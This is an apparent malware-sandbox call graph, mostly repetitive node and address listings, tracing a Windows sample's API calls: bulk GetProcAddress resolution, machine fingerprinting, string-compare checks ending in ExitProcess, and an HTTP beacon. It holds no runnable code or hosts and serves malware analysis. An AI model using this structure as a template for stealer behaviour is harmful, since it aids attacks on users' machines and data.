402a4c 77936->77937 77938 4024d7 9 API calls 77937->77938 77939 402a5d 77938->77939 77940 4024d7 9 API calls 77939->77940 77941 402a6e 77940->77941 77942 4024d7 9 API calls 77941->77942 77943 402a7f 77942->77943 77944 4024d7 9 API calls 77943->77944 77945 402a90 77944->77945 77946 4024d7 9 API calls 77945->77946 77947 402aa1 77946->77947 77948 4024d7 9 API calls 77947->77948 77949 402ab2 77948->77949 77950 4024d7 9 API calls 77949->77950 77951 402ac3 77950->77951 77952 4024d7 9 API calls 77951->77952 77953 402ad4 77952->77953 77954 4024d7 9 API calls 77953->77954 77955 402ae5 77954->77955 77956 4024d7 9 API calls 77955->77956 77957 402af6 77956->77957 77958 4024d7 9 API calls 77957->77958 77959 402b07 77958->77959 77960 4024d7 9 API calls 77959->77960 77961 402b18 77960->77961 77962 4024d7 9 API calls 77961->77962 77963 402b29 77962->77963 77964 4024d7 9 API calls 77963->77964 77965 402b3a 77964->77965 77966 4024d7 9 API calls 77965->77966 77967 402b4b 77966->77967 77968 4024d7 9 API calls 77967->77968 77969 402b5c 77968->77969 77970 4024d7 9 API calls 77969->77970 77971 402b6d 77970->77971 77972 4024d7 9 API calls 77971->77972 77973 402b7e 77972->77973 77974 4024d7 9 API calls 77973->77974 77975 402b8f 77974->77975 77976 4024d7 9 API calls 77975->77976 77977 402ba0 77976->77977 77978 4024d7 9 API calls 77977->77978 77979 402bb1 77978->77979 77980 4024d7 9 API calls 77979->77980 77981 402bc2 77980->77981 77982 4024d7 9 API calls 77981->77982 77983 402bd3 77982->77983 77984 4024d7 9 API calls 77983->77984 77985 402be4 77984->77985 77986 4024d7 9 API calls 77985->77986 77987 402bf5 77986->77987 77988 4024d7 9 API calls 77987->77988 77989 402c06 77988->77989 77990 4024d7 9 API calls 77989->77990 77991 402c17 77990->77991 77992 4024d7 9 API calls 77991->77992 77993 402c28 77992->77993 77994 4024d7 9 API calls 77993->77994 77995 402c39 77994->77995 77996 4024d7 9 API calls 77995->77996 77997 402c4a 77996->77997 77998 4024d7 9 API calls 77997->77998 77999 402c5b 77998->77999 78000 4024d7 9 API calls 77999->78000 78001 402c6c 78000->78001 78002 4024d7 9 API calls 78001->78002 78003 402c7d 78002->78003 78004 4024d7 9 API calls 78003->78004 78005 402c8e 78004->78005 78006 4024d7 9 API calls 78005->78006 78007 402c9f 78006->78007 78008 4024d7 9 API calls 78007->78008 78009 402cb0 78008->78009 78010 4024d7 9 API calls 78009->78010 78011 402cc1 78010->78011 78012 4024d7 9 API calls 78011->78012 78013 402cd2 78012->78013 78014 4024d7 9 API calls 78013->78014 78015 402ce3 78014->78015 78016 4024d7 9 API calls 78015->78016 78017 402cf4 78016->78017 78018 4024d7 9 API calls 78017->78018 78019 402d05 78018->78019 78020 4024d7 9 API calls 78019->78020 78021 402d16 78020->78021 78022 4024d7 9 API calls 78021->78022 78023 402d27 78022->78023 78024 4024d7 9 API calls 78023->78024 78025 402d38 78024->78025 78026 4024d7 9 API calls 78025->78026 78027 402d49 78026->78027 78028 4024d7 9 API calls 78027->78028 78029 402d5a 78028->78029 78030 4024d7 9 API calls 78029->78030 78031 402d6b 78030->78031 78032 4024d7 9 API calls 78031->78032 78033 402d7c 78032->78033 78034 4024d7 9 API calls 78033->78034 78035 402d8d 78034->78035 78036 4024d7 9 API calls 78035->78036 78037 402d9e 78036->78037 78038 4024d7 9 API calls 78037->78038 78039 402daf 78038->78039 78040 4024d7 9 API calls 78039->78040 78041 402dc0 78040->78041 78042 4024d7 9 API calls 78041->78042 78043 402dd1 78042->78043 78044 4024d7 9 API calls 78043->78044 78045 402de2 78044->78045 78046 4024d7 9 API calls 78045->78046 78047 402df3 78046->78047 78048 4024d7 9 API calls 78047->78048 78049 402e04 78048->78049 78050 4024d7 9 API calls 78049->78050 78051 402e15 78050->78051 78052 4024d7 9 API calls 78051->78052 78053 402e26 78052->78053 78054 4024d7 9 API calls 78053->78054 78055 402e37 78054->78055 78056 4024d7 9 API calls 78055->78056 78057 402e48 78056->78057 78058 4024d7 9 API calls 78057->78058 78059 402e59 78058->78059 78060 4024d7 9 API calls 78059->78060 78061 402e6a 78060->78061 78062 4024d7 9 API calls 78061->78062 78063 402e7b 78062->78063 78064 4024d7 9 API calls 78063->78064 78065 402e8c 78064->78065 78066 4024d7 9 API calls 78065->78066 78067 402e9d 78066->78067 78068 4024d7 9 API calls 78067->78068 78069 402eae 78068->78069 78070 4024d7 9 API calls 78069->78070 78071 402ebf 78070->78071 78072 4024d7 9 API calls 78071->78072 78073 402ed0 78072->78073 78074 4024d7 9 API calls 78073->78074 78075 402ee1 78074->78075 78076 4024d7 9 API calls 78075->78076 78077 402ef2 78076->78077 78078 4024d7 9 API calls 78077->78078 78079 402f03 78078->78079 78080 4024d7 9 API calls 78079->78080 78081 402f14 78080->78081 78082 4024d7 9 API calls 78081->78082 78083 402f25 78082->78083 78084 4024d7 9 API calls 78083->78084 78085 402f36 78084->78085 78086 4024d7 9 API calls 78085->78086 78087 402f47 78086->78087 78088 4024d7 9 API calls 78087->78088 78089 402f58 78088->78089 78090 4024d7 9 API calls 78089->78090 78091 402f69 78090->78091 78092 4024d7 9 API calls 78091->78092 78093 402f7a 78092->78093 78094 4024d7 9 API calls 78093->78094 78095 402f8b 78094->78095 78096 4024d7 9 API calls 78095->78096 78097 402f9c 78096->78097 78098 4024d7 9 API calls 78097->78098 78099 402fad 78098->78099 78100 4024d7 9 API calls 78099->78100 78101 402fbe 78100->78101 78102 4024d7 9 API calls 78101->78102 78103 402fcf 78102->78103 78104 4024d7 9 API calls 78103->78104 78105 402fe0 78104->78105 78106 4024d7 9 API calls 78105->78106 78107 402ff1 78106->78107 78108 4024d7 9 API calls 78107->78108 78109 403002 78108->78109 78110 4024d7 9 API calls 78109->78110 78111 403013 78110->78111 78112 4024d7 9 API calls 78111->78112 78113 403024 78112->78113 78114 4024d7 9 API calls 78113->78114 78115 403035 78114->78115 78116 4024d7 9 API calls 78115->78116 78117 403046 78116->78117 78118 4024d7 9 API calls 78117->78118 78119 403057 78118->78119 78120 4024d7 9 API calls 78119->78120 78121 403068 78120->78121 78122 4024d7 9 API calls 78121->78122 78123 403079 78122->78123 78124 4024d7 9 API calls 78123->78124 78125 40308a 78124->78125 78126 4024d7 9 API calls 78125->78126 78127 40309b 78126->78127 78128 4024d7 9 API calls 78127->78128 78129 4030ac 78128->78129 78130 4024d7 9 API calls 78129->78130 78131 4030bd 78130->78131 78132 4024d7 9 API calls 78131->78132 78133 4030ce 78132->78133 78134 4024d7 9 API calls 78133->78134 78135 4030df 78134->78135 78136 4024d7 9 API calls 78135->78136 78137 4030f0 78136->78137 78138 4024d7 9 API calls 78137->78138 78139 403101 78138->78139 78140 4024d7 9 API calls 78139->78140 78141 403112 78140->78141 78142 4024d7 9 API calls 78141->78142 78143 403123 78142->78143 78144 4024d7 9 API calls 78143->78144 78145 403134 78144->78145 78146 4024d7 9 API calls 78145->78146 78147 403145 78146->78147 78148 4024d7 9 API calls 78147->78148 78149 403156 78148->78149 78150 4024d7 9 API calls 78149->78150 78151 403167 78150->78151 78152 4024d7 9 API calls 78151->78152 78153 403178 78152->78153 78154 4024d7 9 API calls 78153->78154 78155 403189 78154->78155 78156 4024d7 9 API calls 78155->78156 78157 40319a 78156->78157 78158 4024d7 9 API calls 78157->78158 78159 4031ab 78158->78159 78160 4024d7 9 API calls 78159->78160 78161 4031bc 78160->78161 78162 4024d7 9 API calls 78161->78162 78163 4031cd 78162->78163 78164 4024d7 9 API calls 78163->78164 78165 4031de 78164->78165 78166 4024d7 9 API calls 78165->78166 78167 4031ef 78166->78167 78168 4024d7 9 API calls 78167->78168 78169 403200 78168->78169 78170 4024d7 9 API calls 78169->78170 78171 403211 78170->78171 78172 4024d7 9 API calls 78171->78172 78173 403222 78172->78173 78174 4024d7 9 API calls 78173->78174 78175 403233 78174->78175 78176 4024d7 9 API calls 78175->78176 78177 403244 78176->78177 78178 4024d7 9 API calls 78177->78178 78179 403255 78178->78179 78180 4024d7 9 API calls 78179->78180 78181 403266 78180->78181 78182 4024d7 9 API calls 78181->78182 78183 403277 78182->78183 78184 4024d7 9 API calls 78183->78184 78185 403288 78184->78185 78186 4024d7 9 API calls 78185->78186 78187 403299 78186->78187 78188 4024d7 9 API calls 78187->78188 78189 4032aa 78188->78189 78190 4024d7 9 API calls 78189->78190 78191 4032bb 78190->78191 78192 4024d7 9 API calls 78191->78192 78193 4032cc 78192->78193 78194 4024d7 9 API calls 78193->78194 78195 4032dd 78194->78195 78196 4024d7 9 API calls 78195->78196 78197 4032ee 78196->78197 78198 4024d7 9 API calls 78197->78198 78199 4032ff 78198->78199 78200 4024d7 9 API calls 78199->78200 78201 403310 78200->78201 78202 4024d7 9 API calls 78201->78202 78203 403321 78202->78203 78204 4024d7 9 API calls 78203->78204 78205 403332 78204->78205 78206 4024d7 9 API calls 78205->78206 78207 403343 78206->78207 78208 4024d7 9 API calls 78207->78208 78209 403354 78208->78209 78210 4024d7 9 API calls 78209->78210 78211 403365 78210->78211 78212 4024d7 9 API calls 78211->78212 78213 403376 78212->78213 78214 4024d7 9 API calls 78213->78214 78215 403387 78214->78215 78216 4024d7 9 API calls 78215->78216 78217 403398 78216->78217 78218 4024d7 9 API calls 78217->78218 78219 4033a9 78218->78219 78220 4024d7 9 API calls 78219->78220 78221 4033ba 78220->78221 78222 4024d7 9 API calls 78221->78222 78223 4033cb 78222->78223 78224 4024d7 9 API calls 78223->78224 78225 4033dc 78224->78225 78226 4024d7 9 API calls 78225->78226 78227 4033ed 78226->78227 78228 4024d7 9 API calls 78227->78228 78229 4033fe 78228->78229 78230 4024d7 9 API calls 78229->78230 78231 40340f 78230->78231 78232 4024d7 9 API calls 78231->78232 78233 403420 78232->78233 78234 4024d7 9 API calls 78233->78234 78235 403431 78234->78235 78236 4024d7 9 API calls 78235->78236 78237 403442 78236->78237 78238 4024d7 9 API calls 78237->78238 78239 403453 78238->78239 78240 4024d7 9 API calls 78239->78240 78241 403464 78240->78241 78242 4024d7 9 API calls 78241->78242 78243 403475 78242->78243 78244 4024d7 9 API calls 78243->78244 78245 403486 78244->78245 78246 4024d7 9 API calls 78245->78246 78247 403497 78246->78247 78248 4024d7 9 API calls 78247->78248 78249 4034a8 78248->78249 78250 4024d7 9 API calls 78249->78250 78251 4034b9 78250->78251 78252 4024d7 9 API calls 78251->78252 78253 4034ca 78252->78253 78254 4024d7 9 API calls 78253->78254 78255 4034db 78254->78255 78256 4024d7 9 API calls 78255->78256 78257 4034ec 78256->78257 78258 4024d7 9 API calls 78257->78258 78259 4034fd 78258->78259 78260 4024d7 9 API calls 78259->78260 78261 40350e 78260->78261 78262 4024d7 9 API calls 78261->78262 78263 40351f 78262->78263 78264 4024d7 9 API calls 78263->78264 78265 403530 78264->78265 78266 4024d7 9 API calls 78265->78266 78267 403541 78266->78267 78268 4024d7 9 API calls 78267->78268 78269 403552 78268->78269 78270 4024d7 9 API calls 78269->78270 78271 403563 78270->78271 78272 4024d7 9 API calls 78271->78272 78273 403574 78272->78273 78274 4024d7 9 API calls 78273->78274 78275 403585 78274->78275 78276 4024d7 9 API calls 78275->78276 78277 403596 78276->78277 78278 4024d7 9 API calls 78277->78278 78279 4035a7 78278->78279 78280 4024d7 9 API calls 78279->78280 78281 4035b8 78280->78281 78282 4024d7 9 API calls 78281->78282 78283 4035c9 78282->78283 78284 4024d7 9 API calls 78283->78284 78285 4035da 78284->78285 78286 4024d7 9 API calls 78285->78286 78287 4035eb 78286->78287 78288 4024d7 9 API calls 78287->78288 78289 4035fc 78288->78289 78290 4024d7 9 API calls 78289->78290 78291 40360d 78290->78291 78292 4024d7 9 API calls 78291->78292 78293 40361e 78292->78293 78294 4024d7 9 API calls 78293->78294 78295 40362f 78294->78295 78296 4024d7 9 API calls 78295->78296 78297 403640 78296->78297 78298 4024d7 9 API calls 78297->78298 78299 403651 78298->78299 78300 4024d7 9 API calls 78299->78300 78301 403662 78300->78301 78302 4024d7 9 API calls 78301->78302 78303 403673 78302->78303 78304 4024d7 9 API calls 78303->78304 78305 403684 78304->78305 78306 4024d7 9 API calls 78305->78306 78307 403695 78306->78307 78308 4024d7 9 API calls 78307->78308 78309 4036a6 78308->78309 78310 4024d7 9 API calls 78309->78310 78311 4036b7 78310->78311 78312 4024d7 9 API calls 78311->78312 78313 4036c8 78312->78313 78314 4024d7 9 API calls 78313->78314 78315 4036d9 78314->78315 78316 4024d7 9 API calls 78315->78316 78317 4036ea 78316->78317 78318 4024d7 9 API calls 78317->78318 78319 4036fb 78318->78319 78320 4024d7 9 API calls 78319->78320 78321 40370c 78320->78321 78322 4024d7 9 API calls 78321->78322 78323 40371d 78322->78323 78324 4024d7 9 API calls 78323->78324 78325 40372e 78324->78325 78326 4024d7 9 API calls 78325->78326 78327 40373f 78326->78327 78328 4024d7 9 API calls 78327->78328 78329 403750 78328->78329 78330 4024d7 9 API calls 78329->78330 78331 403761 78330->78331 78332 4024d7 9 API calls 78331->78332 78333 403772 78332->78333 78334 4024d7 9 API calls 78333->78334 78335 403783 78334->78335 78336 4024d7 9 API calls 78335->78336 78337 403794 78336->78337 78338 4024d7 9 API calls 78337->78338 78339 4037a5 78338->78339 78340 4024d7 9 API calls 78339->78340 78341 4037b6 78340->78341 78342 4024d7 9 API calls 78341->78342 78343 4037c7 78342->78343 78344 4024d7 9 API calls 78343->78344 78345 4037d8 78344->78345 78346 4024d7 9 API calls 78345->78346 78347 4037e9 78346->78347 78348 4024d7 9 API calls 78347->78348 78349 4037fa 78348->78349 78350 4024d7 9 API calls 78349->78350 78351 40380b 78350->78351 78352 4024d7 9 API calls 78351->78352 78353 40381c 78352->78353 78354 4024d7 9 API calls 78353->78354 78355 40382d 78354->78355 78356 4024d7 9 API calls 78355->78356 78357 40383e 78356->78357 78358 4024d7 9 API calls 78357->78358 78359 40384f 78358->78359 78360 4024d7 9 API calls 78359->78360 78361 403860 78360->78361 78362 4024d7 9 API calls 78361->78362 78363 403871 78362->78363 78364 4024d7 9 API calls 78363->78364 78365 403882 78364->78365 78366 4024d7 9 API calls 78365->78366 78367 403893 78366->78367 78368 4024d7 9 API calls 78367->78368 78369 4038a4 78368->78369 78370 4024d7 9 API calls 78369->78370 78371 4038b5 78370->78371 78372 4024d7 9 API calls 78371->78372 78373 4038c6 78372->78373 78374 4024d7 9 API calls 78373->78374 78375 4038d7 78374->78375 78376 4024d7 9 API calls 78375->78376 78377 4038e8 78376->78377 78378 4024d7 9 API calls 78377->78378 78379 4038f9 78378->78379 78380 4024d7 9 API calls 78379->78380 78381 40390a 78380->78381 78382 4024d7 9 API calls 78381->78382 78383 40391b 78382->78383 78384 4024d7 9 API calls 78383->78384 78385 40392c 78384->78385 78386 4024d7 9 API calls 78385->78386 78387 40393d 78386->78387 78388 4024d7 9 API calls 78387->78388 78389 40394e 78388->78389 78390 4024d7 9 API calls 78389->78390 78391 40395f 78390->78391 78392 4024d7 9 API calls 78391->78392 78393 403970 78392->78393 78394 4024d7 9 API calls 78393->78394 78395 403981 78394->78395 78396 4024d7 9 API calls 78395->78396 78397 403992 78396->78397 78398 4024d7 9 API calls 78397->78398 78399 4039a3 78398->78399 78400 4024d7 9 API calls 78399->78400 78401 4039b4 78400->78401 78402 4024d7 9 API calls 78401->78402 78403 4039c5 78402->78403 78404 4024d7 9 API calls 78403->78404 78405 4039d6 78404->78405 78406 4024d7 9 API calls 78405->78406 78407 4039e7 78406->78407 78408 4024d7 9 API calls 78407->78408 78409 4039f8 78408->78409 78410 4024d7 9 API calls 78409->78410 78411 403a09 78410->78411 78412 4024d7 9 API calls 78411->78412 78413 403a1a 78412->78413 78414 4024d7 9 API calls 78413->78414 78415 403a2b 78414->78415 78416 4024d7 9 API calls 78415->78416 78417 403a3c 78416->78417 78418 4024d7 9 API calls 78417->78418 78419 403a4d 78418->78419 78420 417645 78419->78420 78421 417652 43 API calls 78420->78421 78422 417a2a 9 API calls 78420->78422 78421->78422 78423 417b39 78422->78423 78424 417acb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78422->78424 78425 417b46 8 API calls 78423->78425 78426 417bf9 78423->78426 78424->78423 78425->78426 78427 417c70 78426->78427 78428 417c02 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78426->78428 78429 417d02 78427->78429 78430 417c7d 6 API calls 78427->78430 78428->78427 78431 417dd9 78429->78431 78432 417d0f 9 API calls 78429->78432 78430->78429 78433 417e50 78431->78433 78434 417de2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78431->78434 78432->78431 78435 417e82 78433->78435 78436 417e59 GetProcAddress GetProcAddress 78433->78436 78434->78433 78437 417eb4 78435->78437 78438 417e8b GetProcAddress GetProcAddress 78435->78438 78436->78435 78439 417ec1 10 API calls 78437->78439 78440 417fa0 78437->78440 78438->78437 78439->78440 78441 418000 78440->78441 78442 417fa9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78440->78442 78443 418009 GetProcAddress 78441->78443 78444 41801b 78441->78444 78442->78441 78443->78444 78445 418024 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78444->78445 78446 41807b 78444->78446 78445->78446 78447 416aac 78446->78447 78448 418084 GetProcAddress 78446->78448 78449 410b5c _EH_prolog 78447->78449 78448->78447 78450 40f923 lstrcpy 78449->78450 78451 410b83 78450->78451 78452 40f923 lstrcpy 78451->78452 78453 410b9a GetSystemTime 78452->78453 78454 410bb8 78453->78454 78454->77662 78457 40fa65 78455->78457 78456 40fa89 78456->77671 78457->78456 78458 40fa77 lstrcpy lstrcat 78457->78458 78458->78456 78460 40f95a lstrcpy 78459->78460 78461 4010cc 78460->78461 78462 40f95a lstrcpy 78461->78462 78463 4010dc 78462->78463 78464 40f95a lstrcpy 78463->78464 78465 4010ec 78464->78465 78466 40f95a lstrcpy 78465->78466 78467 401108 78466->78467 78468 41390c _EH_prolog 78467->78468 78469 4135ac _EH_prolog 78468->78469 78470 413932 78469->78470 78471 40f997 2 API calls 78470->78471 78472 413946 78471->78472 78473 40f997 2 API calls 78472->78473 78474 413953 78473->78474 78475 40f997 2 API calls 78474->78475 78476 413960 78475->78476 78477 40f923 lstrcpy 78476->78477 78478 413970 78477->78478 78479 40f923 lstrcpy 78478->78479 78480 413981 78479->78480 78481 40f923 lstrcpy 78480->78481 78482 413992 78481->78482 78483 40f923 lstrcpy 78482->78483 78484 4139a3 78483->78484 78485 40f923 lstrcpy 78484->78485 78486 4139b4 78485->78486 78487 40f923 lstrcpy 78486->78487 78572 4139c5 78487->78572 78488 4020f9 lstrcpy 78488->78572 78490 40212d lstrcpy 78490->78572 78491 4010b1 _EH_prolog lstrcpy 78491->78572 78492 413adc StrCmpCA 78492->78572 78493 413b5d StrCmpCA 78494 41435b 78493->78494 78493->78572 78495 40f9e1 lstrcpy 78494->78495 78496 41436a 78495->78496 79605 40212d 78496->79605 78499 40f9e1 lstrcpy 78501 414381 78499->78501 78500 413d0a StrCmpCA 78502 414316 78500->78502 78500->78572 79608 402286 lstrcpy 78501->79608 78503 40f9e1 lstrcpy 78502->78503 78505 414325 78503->78505 78504 402147 lstrcpy 78504->78572 79603 40217b lstrcpy 78505->79603 78509 41432e 78511 40f9e1 lstrcpy 78509->78511 78510 414396 78512 40f9e1 lstrcpy 78510->78512 78514 41433c 78511->78514 78515 4143a4 78512->78515 78513 413eb7 StrCmpCA 78516 4142d1 78513->78516 78513->78572 79604 4022a0 lstrcpy 78514->79604 79609 4132d9 lstrcpy _EH_prolog 78515->79609 78517 40f9e1 lstrcpy 78516->78517 78518 4142e0 78517->78518 79601 4021c9 lstrcpy 78518->79601 78523 4142e9 78526 40f9e1 lstrcpy 78523->78526 78524 414261 78528 40f9e1 lstrcpy 78524->78528 78525 414064 StrCmpCA 78527 41428f 78525->78527 78525->78572 78529 4142f7 78526->78529 78532 40f9e1 lstrcpy 78527->78532 78531 41426f 78528->78531 79602 4022ba lstrcpy 78529->79602 78530 413118 33 API calls 78530->78572 79598 4132d9 lstrcpy _EH_prolog 78531->79598 78534 41429e 78532->78534 78533 413c89 StrCmpCA 78533->78572 79599 402217 lstrcpy 78534->79599 78535 402195 lstrcpy 78535->78572 78539 40217b lstrcpy 78539->78572 78541 4142a7 78543 40f9e1 lstrcpy 78541->78543 78542 41420b StrCmpCA 78545 414226 78542->78545 78546 414216 Sleep 78542->78546 78544 4142b5 78543->78544 79600 4022d4 lstrcpy 78544->79600 78549 40f9e1 lstrcpy 78545->78549 78546->78572 78547 41303a 28 API calls 78547->78572 78548 402231 lstrcpy 78548->78572 78550 414235 78549->78550 79596 402265 lstrcpy 78550->79596 78551 413e36 StrCmpCA 78551->78572 78553 4021e3 lstrcpy 78553->78572 78556 41428a 78559 413295 _EH_prolog 78556->78559 78557 41423e 78560 40f9e1 lstrcpy 78557->78560 78558 4021c9 lstrcpy 78558->78572 78561 41441b 78559->78561 78562 41424c 78560->78562 79590 401061 _EH_prolog 78561->79590 79597 4022ee lstrcpy 78562->79597 78564 413fe3 StrCmpCA 78564->78572 78565 414427 78573 4136b3 78565->78573 78567 402217 lstrcpy 78567->78572 78568 414190 StrCmpCA 78568->78572 78569 402265 lstrcpy 78569->78572 78570 40f95a lstrcpy 78570->78572 78571 40f9e1 lstrcpy 78571->78572 78572->78488 78572->78490 78572->78491 78572->78492 78572->78493 78572->78500 78572->78504 78572->78513 78572->78525 78572->78530 78572->78533 78572->78535 78572->78539 78572->78542 78572->78547 78572->78548 78572->78551 78572->78553 78572->78558 78572->78564 78572->78567 78572->78568 78572->78569 78572->78570 78572->78571 79587 402113 78572->79587 79592 402161 lstrcpy 78572->79592 79593 4021af lstrcpy 78572->79593 79594 4021fd lstrcpy 78572->79594 79595 40224b lstrcpy 78572->79595 78574 40f9e1 lstrcpy 78573->78574 78575 4136c3 78574->78575 78576 40f9e1 lstrcpy 78575->78576 78577 4136cf 78576->78577 78578 40f9e1 lstrcpy 78577->78578 78579 4136db 78578->78579 78580 413295 _EH_prolog 78579->78580 78581 4132b5 78580->78581 78581->77681 78583 40f971 78582->78583 78584 40f986 78583->78584 78585 40f97e lstrcpy 78583->78585 78584->77688 78585->78584 78586->77698 78588 410516 GetVolumeInformationA 78587->78588 78589 41050f 78587->78589 78590 410546 78588->78590 78589->78588 78591 410578 GetProcessHeap HeapAlloc 78590->78591 78592 41059b wsprintfA lstrcat 78591->78592 78593 41058d 78591->78593 79610 4104a2 GetCurrentHwProfileA 78592->79610 78594 40f923 lstrcpy 78593->78594 78596 410596 78594->78596 78596->77705 78597 4105cb 78598 4105da lstrlenA 78597->78598 78599 4105ee 78598->78599 79614 411154 lstrcpy malloc strncpy 78599->79614 78601 4105f8 78602 410606 lstrcat 78601->78602 78603 410619 78602->78603 78604 40f923 lstrcpy 78603->78604 78605 41062a 78604->78605 78605->78596 78607 40f95a lstrcpy 78606->78607 78608 403b25 78607->78608 79615 403a54 _EH_prolog 78608->79615 78610 403b31 78611 40f923 lstrcpy 78610->78611 78612 403b4e 78611->78612 78613 40f923 lstrcpy 78612->78613 78614 403b61 78613->78614 78615 40f923 lstrcpy 78614->78615 78616 403b72 78615->78616 78617 40f923 lstrcpy 78616->78617 78618 403b83 78617->78618 78619 40f923 lstrcpy 78618->78619 78620 403b94 78619->78620 78621 403ba4 InternetOpenA StrCmpCA 78620->78621 78622 403bc6 78621->78622 78623 404122 InternetCloseHandle 78622->78623 78624 410b5c 3 API calls 78622->78624 78637 404136 78623->78637 78625 403bdc 78624->78625 78626 40fa28 3 API calls 78625->78626 78627 403bef 78626->78627 78628 40f9e1 lstrcpy 78627->78628 78629 403bfc 78628->78629 78630 40fa9c 4 API calls 78629->78630 78631 403c25 78630->78631 78632 40f9e1 lstrcpy 78631->78632 78633 403c32 78632->78633 78634 40fa9c 4 API calls 78633->78634 78635 403c4f 78634->78635 78636 40f9e1 lstrcpy 78635->78636 78638 403c5c 78636->78638 78637->77708 78639 40fa28 3 API calls 78638->78639 78640 403c78 78639->78640 78641 40f9e1 lstrcpy 78640->78641 78642 403c85 78641->78642 78643 40fa9c 4 API calls 78642->78643 78644 403ca2 78643->78644 78645 40f9e1 lstrcpy 78644->78645 78646 403caf 78645->78646 78647 40fa9c 4 API calls 78646->78647 78648 403ccc 78647->78648 78649 40f9e1 lstrcpy 78648->78649 78650 403cd9 78649->78650 78651 40fa9c 4 API calls 78650->78651 78652 403cf7 78651->78652 78653 40fa28 3 API calls 78652->78653 78654 403d0a 78653->78654 78655 40f9e1 lstrcpy 78654->78655 78656 403d17 78655->78656 78657 403d2f InternetConnectA 78656->78657 78657->78623 78658 403d55 HttpOpenRequestA 78657->78658 78659 404119 InternetCloseHandle 78658->78659 78660 403d8e 78658->78660 78659->78623 78661 403d92 InternetSetOptionA 78660->78661 78662 403da8 78660->78662 78661->78662 78663 40fa9c 4 API calls 78662->78663 78664 403db9 78663->78664 78665 40f9e1 lstrcpy 78664->78665 78666 403dc6 78665->78666 78667 40fa28 3 API calls 78666->78667 78668 403de2 78667->78668 78669 40f9e1 lstrcpy 78668->78669 78670 403def 78669->78670 78671 40fa9c 4 API calls 78670->78671 78672 403e0c 78671->78672 78673 40f9e1 lstrcpy 78672->78673 78674 403e19 78673->78674 78675 40fa9c 4 API calls 78674->78675 78676 403e37 78675->78676 78677 40f9e1 lstrcpy 78676->78677 78678 403e44 78677->78678 78679 40fa9c 4 API calls 78678->78679 78680 403e61 78679->78680 78681 40f9e1 lstrcpy 78680->78681 78682 403e6e 78681->78682 78683 40fa9c 4 API calls 78682->78683 78684 403e8b 78683->78684 78685 40f9e1 lstrcpy 78684->78685 78686 403e98 78685->78686 78687 40fa28 3 API calls 78686->78687 78688 403eb4 78687->78688 78689 40f9e1 lstrcpy 78688->78689 78690 403ec1 78689->78690 78691 40fa9c 4 API calls 78690->78691 78692 403ede 78691->78692 78693 40f9e1 lstrcpy 78692->78693 78694 403eeb 78693->78694 78695 40fa9c 4 API calls 78694->78695 78696 403f08 78695->78696 78697 40f9e1 lstrcpy 78696->78697 78698 403f15 78697->78698 78699 40fa28 3 API calls 78698->78699 78700 403f31 78699->78700 78701 40f9e1 lstrcpy 78700->78701 78702 403f3e 78701->78702 78703 40fa9c 4 API calls 78702->78703 78704 403f5b 78703->78704 78705 40f9e1 lstrcpy 78704->78705 78706 403f68 78705->78706 78707 40fa9c 4 API calls 78706->78707 78708 403f86 78707->78708 78709 40f9e1 lstrcpy 78708->78709 78710 403f93 78709->78710 78711 40fa9c 4 API calls 78710->78711 78712 403fb0 78711->78712 78713 40f9e1 lstrcpy 78712->78713 78714 403fbd 78713->78714 78715 40fa9c 4 API calls 78714->78715 78716 403fda 78715->78716 78717 40f9e1 lstrcpy 78716->78717 78718 403fe7 78717->78718 78719 40fa28 3 API calls 78718->78719 78720 404003 78719->78720 78721 40f9e1 lstrcpy 78720->78721 78722 404010 78721->78722 78723 40f923 lstrcpy 78722->78723 78724 404029 78723->78724 78725 40fa28 3 API calls 78724->78725 78726 40403d 78725->78726 78727 40fa28 3 API calls 78726->78727 78728 404050 78727->78728 78729 40f9e1 lstrcpy 78728->78729 78730 40405d 78729->78730 78731 40407d lstrlenA 78730->78731 78732 40408d 78731->78732 78733 404096 lstrlenA 78732->78733 79623 40fb4d 78733->79623 78735 4040a6 HttpSendRequestA 78736 4040ef InternetReadFile 78735->78736 78737 404106 InternetCloseHandle 78736->78737 78740 4040b5 78736->78740 79624 40f98e 78737->79624 78739 40fa9c 4 API calls 78739->78740 78740->78736 78740->78737 78740->78739 78741 40f9e1 lstrcpy 78740->78741 78741->78740 79628 40fb4d 78742->79628 78744 411cfe StrCmpCA 78745 411d10 78744->78745 78746 411d09 ExitProcess 78744->78746 78747 411d20 strtok_s 78745->78747 78748 411e6d 78747->78748 78761 411d31 78747->78761 78748->77710 78749 411e52 strtok_s 78749->78748 78749->78761 78750 411d81 StrCmpCA 78750->78749 78750->78761 78751 411df1 StrCmpCA 78751->78749 78751->78761 78752 411d65 StrCmpCA 78752->78749 78752->78761 78753 411dc7 StrCmpCA 78753->78749 78753->78761 78754 411e06 StrCmpCA 78754->78749 78755 411d49 StrCmpCA 78755->78749 78755->78761 78756 411d9d StrCmpCA 78756->78749 78756->78761 78757 411ddc StrCmpCA 78757->78749 78757->78761 78758 411e1c StrCmpCA 78758->78749 78759 411e3e StrCmpCA 78759->78749 78760 40f997 2 API calls 78760->78761 78761->78749 78761->78750 78761->78751 78761->78752 78761->78753 78761->78754 78761->78755 78761->78756 78761->78757 78761->78758 78761->78759 78761->78760 78763 40f95a lstrcpy 78762->78763 78764 40517c 78763->78764 78765 403a54 6 API calls 78764->78765 78766 405188 78765->78766 78767 40f923 lstrcpy 78766->78767 78768 4051a5 78767->78768 78769 40f923 lstrcpy 78768->78769 78770 4051b8 78769->78770 78771 40f923 lstrcpy 78770->78771 78772 4051c9 78771->78772 78773 40f923 lstrcpy 78772->78773 78774 4051da 78773->78774 78775 40f923 lstrcpy 78774->78775 78776 4051eb 78775->78776 78777 4051fb InternetOpenA StrCmpCA 78776->78777 78778 40521d 78777->78778 78779 4058d8 InternetCloseHandle 78778->78779 78781 410b5c 3 API calls 78778->78781 78780 4058f3 78779->78780 79635 406242 CryptStringToBinaryA 78780->79635 78782 405233 78781->78782 78784 40fa28 3 API calls 78782->78784 78786 405246 78784->78786 78787 40f9e1 lstrcpy 78786->78787 78792 405253 78787->78792 78788 40f997 2 API calls 78789 40590c 78788->78789 78790 40fa9c 4 API calls 78789->78790 78791 40591a 78790->78791 78793 40f9e1 lstrcpy 78791->78793 78794 40fa9c 4 API calls 78792->78794 78798 405926 78793->78798 78795 40527c 78794->78795 78796 40f9e1 lstrcpy 78795->78796 78797 405289 